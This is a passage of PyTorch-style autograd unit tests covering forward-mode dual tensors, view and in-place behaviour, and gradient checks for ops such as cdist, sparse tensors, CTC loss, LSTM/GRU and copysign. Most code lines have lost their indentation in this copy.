    #     - Interaction with backward-mode AD (regular ops)
    #   - View + inplace work fine for both modes
    #   - Proper cleanup happens on exit of a level
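    # For orientation, a minimal usage sketch of the API exercised below (comment
    # only, mirroring the calls made in these tests; some_op stands for any op):
    #   with fwAD.dual_level():
    #       dual = fwAD.make_dual(primal, tangent)
    #       out = some_op(dual)
    #       out_primal, out_tangent = fwAD.unpack_dual(out)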
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
            # We don't actually need to enforce that these two are the exact same Python
            # object; this check can be relaxed in the future.
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
            # Unpacking should also only create aliases
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
            # Note that in this test, we use "update" to mean computing the right tangent for the dual.
            # All the inplace operations here are expected to update the primal value of the Tensors,
            # but not always their tangents.
            # Also, all mentions of "non differentiable view" here mean non forward differentiable view
            # unless specified otherwise.
            # See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
            # Check that inplace ops do update differentiable views but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
            # Updates coming through a view of the dual should propagate the tangent as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
            # Entries that were not written to get a tangent of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
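        # When several entries tie for the reduction result, the incoming gradient is
        # split evenly across them: three entries tie in each tensor below, so each
        # receives a gradient of 1/3 and the gradients sum to 1.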
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
            # perturb x to avoid the extremum (points where x and y nearly coincide)
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
        # Test to detect issues in the cdist gradient calculation
        # when the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
            # Check that the backward pass does not produce invalid
            # values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
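            # Build random sparse indices: sample uniformly in [0, 1), scale by the
            # sparse dimension sizes, and cast to long so they form valid coordinates
            # for a tensor of shape `size`.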
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
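            # Identity in forward; backward ignores the incoming gradient and returns
            # the grad_x saved during forward, letting the test inject arbitrary sparse
            # or dense gradients into the same graph.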
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
        # Parent graph is a CPU graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
        # Child GPU graph (much longer than the parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
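            # Identity in forward; backward triggers a reentrant backward over the long
            # GPU graph, so the child graph is still executing when the parent CPU graph
            # raises its simulated error.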
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
        # Parent GPU graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
        # Wait for the autograd thread to clean up failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
batch_size = 64
num_labels = 101
target_length = 15
gradcheck_input_size = 10
ZERO_NONE = 0
ZERO_SOME = 1
ZERO_ALL = 2
# (input_length, vary_lengths, zero_mode)
tests = [(150, False, ZERO_NONE),
(150, True, ZERO_NONE),
(50, True, ZERO_SOME),
(50, True, ZERO_ALL)]
if 'cuda' in device:
tests += [(50, False, ZERO_NONE),
(50, True, ZERO_NONE),
(150, True, ZERO_SOME),
(150, True, ZERO_ALL)]
for input_length, vary_lengths, zero_mode in tests:
targets = torch.randint(1, num_labels, (batch_size, target_length),
device=device, dtype=torch.long)
x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
device=device)
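# gradcheck's cost grows with the number of perturbed input elements, so the
# full (input_length, batch_size, num_labels) activation is generated below
# from the small 10-element `x` via an outer product with the fixed
# `tile_factors`; only those 10 values have to be differentiated numerically.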
input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
if zero_mode == ZERO_ALL:
target_lengths = [0 for _ in range(batch_size)]
else:
target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
if vary_lengths else target_length) for _ in range(batch_size)]
if zero_mode == ZERO_SOME:
idxes = torch.randint(0, batch_size, (10,))
for i in idxes:
target_lengths[i] = 0
def ctc_after_softmax(x):
x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
.view(input_length, batch_size, num_labels))
log_probs = torch.log_softmax(x_full, 2)
return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
batch_size = 16
input_length = 30
num_labels = 101
target_length = 15
targets = torch.randint(1, num_labels, (batch_size * target_length,),
device='cuda', dtype=torch.long)
log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
log_probs.requires_grad_()
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
with torch.backends.cudnn.flags(enabled=False):
loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
input_lengths, target_lengths, reduction='none')
self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), -2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.elu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.celu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither
# (x + 2) nor ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks that it is possible to require gradients for the inputs
# but not for the weight parameters, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
# checks that undefined gradients don't hamper the backward pass
# see #11872
l = torch.nn.LSTMCell(2, 3).to(device).double()
s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
for i in range(2):
out = l(s)[i]
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
def flatten_out(mod, inp):
out = mod(inp)
return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
gradcheckfunc = partial(flatten_out, mod)
with torch.backends.cudnn.flags(enabled=False):
gradcheck(gradcheckfunc, inp, check_batched_grad=False)
gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
if inp.is_cuda and not TEST_WITH_ROCM:
# Assert that we have good error message around unsupported CuDNN double backward
# NB: we trigger double backward using .backward() instead of autograd.grad due to
# https://github.com/pytorch/pytorch/issues/37874
with torch.backends.cudnn.flags(enabled=True):
result = gradcheckfunc(inp)
result[0].sum().backward(create_graph=True)
grad0 = next(mod.parameters()).grad
with self.assertRaisesRegex(RuntimeError,
"please disable the CuDNN backend temporarily"):
grad0.sum().backward()
# Here we avoid the backward(create_graph=True) memory leak
# described in https://github.com/pytorch/pytorch/issues/7343
for param in mod.parameters():
param.grad = None
inp.grad = None
@skipMeta # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
@skipMeta # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
# Input is 0.0
x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Input is -0.0
x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is 0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is -0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
